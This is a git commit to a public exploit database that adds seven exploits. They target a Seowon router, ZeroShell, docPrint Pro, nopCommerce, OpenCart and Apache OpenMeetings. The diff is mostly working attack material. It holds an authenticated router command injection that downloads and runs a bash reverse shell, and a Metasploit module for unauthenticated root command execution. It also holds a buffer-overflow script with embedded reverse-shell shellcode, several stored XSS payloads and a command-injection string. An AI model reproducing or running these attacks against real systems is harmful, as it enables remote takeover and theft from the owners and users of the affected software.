DB: 2020-11-25

7 changes to exploits/shellcodes docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter) nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit) Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated) OpenCart 3.0.3.6 - 'Profile Image' Stored Cross-Site Scripting (Authenticated) OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting
2020-11-25 05:01:56 +00:00 · 2020-11-25 05:01:56 +00:00 · a41b8b4637
commit a41b8b4637
parent 35dd7185fd
8 changed files with 430 additions and 0 deletions
--- a/exploits/hardware/webapps/49097.txt
+++ b/exploits/hardware/webapps/49097.txt
@ -0,0 +1,105 @@
+# Exploit Title: Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)
+# Date: 5 Aug 2020
+# Exploit Author: maj0rmil4d
+# Vendor Homepage: http://www.seowonintech.co.kr/en/
+# Hardware Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kindB05&middle_kindB05_29
+# Version: 1.0.11 (Possibly all versions)
+
+ The default user/pass is admin/admin
+ your commands run as root user
+ the vulnerablity is on the ipAddr parameter in system_log.cgi
+
+ Usage:
+
+ login to the dashboard.
+ setup your listener.
+ download the revshell.txt with the RCE
+ run the revshell.txt
+
+ * here is the RCE request :
+
+POST /cgi-bin/system_log.cgi? HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
+00101 Firefox/79.0
+Accept: */*
+Accept-Language: en-US,en;q0.5
+Accept-Encoding: gzip, deflate
+Content-type: application/x-www-form-urlencoded
+Content-Length: 183
+Origin: http://192.168.1.1
+Connection: close
+Referer: http://192.168.1.1/diagnostic.html?t201802140812
+Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
+connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
+; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
+ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
+cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
+Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
+4662; cpe_loginadmin; _lang
+
+CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
+&pingTimeout30&pingCount4&ipAddr;id&maxTTLCnt30&queriesCnt3&=
+reportIpOnlyCheckboxon&btnApplyApply&T1596644096617
+
+
+* to get a reverse shell, setup the listener and download the file on the r=
+outer then run it .
+* the content of the revshell.txt :
+
+bash -i >& /dev/tcp/192.168.1.10/45214 0>&1
+
+* to download :
+
+
+POST /cgi-bin/system_log.cgi? HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
+00101 Firefox/79.0
+Accept: */*
+Accept-Language: en-US,en;q0.5
+Accept-Encoding: gzip, deflate
+Content-type: application/x-www-form-urlencoded
+Content-Length: 183
+Origin: http://192.168.1.1
+Connection: close
+Referer: http://192.168.1.1/diagnostic.html?t201802140812
+Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
+connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
+; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
+ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
+cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
+Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
+4662; cpe_loginadmin; _lang
+
+CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
+&pingTimeout30&pingCount4&ipAddr;wget http://192.168.1.10/revshell=
+.txt&maxTTLCnt30&queriesCnt3&reportIpOnlyCheckboxon&btnApplyApp=
+ly&T1596644096617
+
+
+* to run it :
+
+POST /cgi-bin/system_log.cgi? HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
+00101 Firefox/79.0
+Accept: */*
+Accept-Language: en-US,en;q0.5
+Accept-Encoding: gzip, deflate
+Content-type: application/x-www-form-urlencoded
+Content-Length: 183
+Origin: http://192.168.1.1
+Connection: close
+Referer: http://192.168.1.1/diagnostic.html?t201802140812
+Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
+connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
+; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
+ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
+cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
+Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
+4662; cpe_loginadmin; _lang
+
+CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
+&pingTimeout30&pingCount4&ipAddr;bash revshell.txt&maxTTLCnt30&=
+queriesCnt3&reportIpOnlyCheckboxon&btnApplyApply&T1596644096617
--- a/exploits/linux/webapps/49096.rb
+++ b/exploits/linux/webapps/49096.rb
@ -0,0 +1,94 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Zeroshell 3.9.0 Remote Command Execution',
+      'Description'    => %q{
+        This module exploits an unauthenticated command injection vulnerability 
+        found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url. 
+        As sudo is configured to execute /bin/tar without a password (NOPASSWD)
+        it is possible to run root commands using the "checkpoint" tar options.
+      },
+      'Author'         => [
+        'Juan Manuel Fernandez', # Vulnerability discovery
+        'Giuseppe Fuggiano <giuseppe[dot]fuggiano[at]gmail.com>', # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2019-12725'],
+        ['URL', 'https://www.tarlogic.com/advisories/zeroshell-rce-root.txt'],
+        ['URL', 'https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py']
+      ],
+      'DisclosureDate' => 'Jul 17 2019',
+      'License'        => MSF_LICENSE,
+      'Privileged'     => true, 
+      'Platform'       => [ 'unix', 'linux' ],
+      'Arch'           => [ ARCH_X86 ],
+      'Targets'        => [
+       ['Zeroshell 3.9.0 (x86)', {
+         'Platform'    => 'linux',
+         'Arch'        => ARCH_X86,
+        }],
+      ],
+      'DefaultTarget'  => 0,
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Use SSL', true]),
+      ])
+  end
+
+  def execute_command(cmd, opts = {})
+    command_payload  = "%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22#{filter_bad_chars(cmd)}%22%0A%27"
+
+    print_status("Sending stager payload...")
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/cgi-bin/kerbynet',
+      'encode_params' => false,
+      'vars_get' => {
+        'Action' => 'x509view',
+        'Section' => 'NoAuthREQ',
+        'User' => '',
+        'x509type' => command_payload
+      }
+    )
+
+    return res
+  end
+
+  def filter_bad_chars(cmd)
+    cmd.gsub!(/chmod \+x/, 'chmod 777')
+    cmd.gsub!(/;/, " %0A ")
+    cmd.gsub!(/ /, '+')
+    cmd.gsub!(/\//, '%2F')
+    return cmd
+  end
+
+  def check
+    res = execute_command('id')
+    if res && res.body.include?("uid=0(root)")
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    print_status("Exploiting...")
+    execute_cmdstager(flavor: :wget, delay: 5)
+  end
+
+end
--- a/exploits/multiple/webapps/49093.txt
+++ b/exploits/multiple/webapps/49093.txt
@ -0,0 +1,42 @@
+# Exploit Title: nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting
+# Date: 24-11-2020
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://www.nopcommerce.com/
+# Version: 4.30
+# Tested on: Windows 10/Kali Linux
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Schedule tasks and each time any user will go to that page of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Schedule tasks.
+
+Steps-To-Reproduce:
+1. Go to the nopCommerce Store admin page.
+2. Now go to the System-Schedule tasks option.
+3. Now click to on edit button on any task.
+4. Put the below payload in Schedule tasks: "hemantsolo"><img src=x onerror=confirm(1)>"
+5. Now click on Update button.
+6. The XSS will be triggered.
+
+POST /Admin/ScheduleTask/TaskUpdate HTTP/1.1
+Host: 127.0.0.1
+Connection: close
+Content-Length: 335
+Accept: application/json, text/javascript, */*; q=0.01
+DNT: 1
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: 127.0.0.1
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: 127.0.0.1/Admin/ScheduleTask/List
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
+Cookie: xyz
+
+Id=5&Name=hemantsolo%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm(1)%3E&Seconds=3600&Enabled=false&StopOnError=false&__RequestVerificationToken=CfDJ8Hstb5ORl7RLtnBnyhE10fENmFHuOPhDq-cN_XNT5gs_nUq2ht5UeggYY9Fea9OqSCeJnVy_e4IKpQ7HhLYwtOMRS76BYcfJ9Os-CI9BxTxrumbAaunwIxrDMZm6CbNRs9EPzKQabez4H7dNpXG6oVpiC5Pc__xQVm06bp4c4O_D15lqehkk6EmqDAizfm8LFA
--- a/exploits/multiple/webapps/49094.txt
+++ b/exploits/multiple/webapps/49094.txt
@ -0,0 +1,20 @@
+# Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service
+# Google Dork: "Apache OpenMeetings DOS"
+# Date: 2020-08-28
+# Exploit Author: SunCSR (ThienNV - Sun* Cyber Security Research)
+# Vendor Homepage: https://openmeetings.apache.org/
+# Software Link: https://openmeetings.apache.org/
+# Version: 4.0.0 - 5.0.0
+# Tested on: Windows
+# CVE: CVE-2020-13951
+
+- POC:
+# Vulnerability variable: hostname
+# Payload: x.x.x.x;ls
+# Request exploit:
+
+GET /openmeetings/wicket/bookmarkable/org.apache.openmeetings.web.pages.HashPage?3-1.0-panel~main&app=network&navigatorAppName=Netscape&navigatorAppVersion=5.0 (Windows)&navigatorAppCodeName=Mozilla&navigatorCookieEnabled=true&navigatorJavaEnabled=false&navigatorLanguage=en-US&navigatorPlatform=Win32&navigatorUserAgent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0&screenWidth=1920&screenHeight=1080&screenColorDepth=24&jsTimeZone=Asia/Ho_Chi_Minh&utcOffset=7&utcDSTOffset=7&browserWidth=1920&browserHeight=966&hostname=x.x.x.x;ls&codebase=https://x.x.x.x:5443/openmeetings/hash&settings=[object Object]&_=1597801817026
+
+- Reference: 
+https://lists.apache.org/thread.html/re2aed827cd24ae73cbc320e5808020c8d12c7b687ee861b27d728bbc%40%3Cuser.openmeetings.apache.org%3E
+https://nvd.nist.gov/vuln/detail/CVE-2020-13951
--- a/exploits/php/webapps/49098.txt
+++ b/exploits/php/webapps/49098.txt
@ -0,0 +1,20 @@
+# Exploit Title: OpenCart 3.0.3.6 - 'Profile Image' Stored Cross Site Scripting (Authenticated)
+# Date: 24-11-2020
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://www.opencart.com/
+# Software Link: https://www.opencart.com/index.php?route=cms/download
+# Version: 3.0.3.6
+# Tested on: Windows 10/Kali Linux
+
+Vulnerable Parameters: Profile Image.
+
+Steps-To-Reproduce:
+1. Go to the opencart admin page.
+
+2. Now go to the profile page.
+
+* Before the next step write this in notepad ""><svg onload=alert("XSS")>" and save it as an payload.png
+
+3. Now edit the image and uplaod the image as payload.png.
+
+4. The XSS will be triggered.
--- a/exploits/php/webapps/49099.txt
+++ b/exploits/php/webapps/49099.txt
@ -0,0 +1,43 @@
+# Exploit Title: OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting
+# Date: 24-11-2020
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://www.opencart.com/
+# Software Link: https://www.opencart.com/index.php?route=cms/download
+# Version: 3.0.3.6
+# Tested on: Windows 10/Kali Linux
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Subject field of the mail and each time any user will open that mail of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Subject of mail.
+
+Steps-To-Reproduce:
+1. Go to the opencart admin page.
+2. Now go to the Marketing-Mail option.
+3. Put the below payload in subject field of the Mail
+: "<script>alert(123)</script>"
+5. Now click on send button.
+6. The XSS will be triggered.
+
+POST /admin/index.php?route=marketing/contact/send&user_token=hYt4UTixry8NDaXiuhXO5mzuahIcOIO5 HTTP/1.1
+Host: localhost
+Connection: close
+Content-Length: 206
+Accept: application/json, text/javascript, */*; q=0.01
+DNT: 1
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: localhost/admin/index.php?route=marketing/contact&user_token=hYt4UTixry8NDaXiuhXO5mzuahIcOIO5
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
+Cookie: __cfduid=d6a6bab42bd30fb2b2e20cad3dd5a80ed1606187757;
+
+store_id=0&to=newsletter&customer_group_id=1&customers=&affiliates=&products=&subject=hemantsolo%22%2F%3E%3Cscript%3Ealert(123)%3C%2Fscript%3E&message=&=&=&=http%3A%2F%2F&=on&files=&=&=&=&=&file=&=&=&=_self
--- a/exploits/windows/local/49100.py
+++ b/exploits/windows/local/49100.py
@ -0,0 +1,99 @@
+# Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)
+# Date: 2020-07-26
+# Exploit Author: MasterVlad
+# Vendor Homepage: http://www.verypdf.com
+# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
+# Version: 8.0
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 7 32-bit
+
+# Proof of Concept:
+
+# 1. Run the python script
+# 2. Open exploit.txt and copy the content to clipboard
+# 3. Open doc2pdf_win.exe and go to File -> Add URL
+# 4. Paste the clipboard into the field and click on Ok
+
+#!/usr/bin/python
+
+# encoded egghunter
+egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A"
+egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
+
+buf =  ""
+buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
+buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
+buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
+buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
+buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
+buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
+buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
+buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
+buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
+buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
+buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
+buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
+buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
+buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
+buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
+buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
+buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
+buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
+buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
+buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
+buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
+buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
+buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
+buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
+buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
+buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
+buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
+buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
+buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
+buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
+buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
+buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
+buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
+buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
+buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
+buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
+buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
+buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
+buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
+buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
+buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
+buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
+buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
+buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
+buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
+buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
+buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
+buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
+buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
+buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"
+
+exploit = "A"*3876
+exploit += "\x74\x06\x75\x04"
+# 0x1001062d - pop pop ret - reg.dll
+exploit += "\x2d\x06\x01\x10"
+exploit += egg
+exploit += "D"*(10000-3884-len(egg)-len(buf)-8)
+exploit += "T00WT00W"
+exploit += buf
+
+f = open("exploit.txt", "w")
+f.write(exploit)
+f.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11205,6 +11205,7 @@ id,file,description,date,author,type,platform,port
 49087,exploits/windows/local/49087.rb,"Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)",2020-11-20,ZwX,local,windows,
 49088,exploits/windows/local/49088.py,"Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit",2020-11-20,stresser,local,windows,
 49089,exploits/windows/local/49089.py,"Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)",2020-11-23,"Luis Martínez",local,windows,
+49100,exploits/windows/local/49100.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-11-24,MasterVlad,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43319,3 +43320,9 @@ id,file,description,date,author,type,platform,port
 49085,exploits/php/webapps/49085.txt,"WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting",2020-11-20,"Hemant Patidar",webapps,php,
 49090,exploits/php/webapps/49090.txt,"VTiger v7.0 CRM - 'To' Persistent XSS",2020-11-23,Vulnerability-Lab,webapps,php,
 49091,exploits/multiple/webapps/49091.txt,"LifeRay 7.2.1 GA2 - Stored XSS",2020-11-23,3ndG4me,webapps,multiple,
+49093,exploits/multiple/webapps/49093.txt,"nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting",2020-11-24,"Hemant Patidar",webapps,multiple,
+49094,exploits/multiple/webapps/49094.txt,"Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service",2020-11-24,SunCSR,webapps,multiple,
+49096,exploits/linux/webapps/49096.rb,"ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)",2020-11-24,"Giuseppe Fuggiano",webapps,linux,
+49097,exploits/hardware/webapps/49097.txt,"Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)",2020-11-24,maj0rmil4d,webapps,hardware,
+49098,exploits/php/webapps/49098.txt,"OpenCart 3.0.3.6 - 'Profile Image' Stored Cross-Site Scripting (Authenticated)",2020-11-24,"Hemant Patidar",webapps,php,
+49099,exploits/php/webapps/49099.txt,"OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting",2020-11-24,"Hemant Patidar",webapps,php,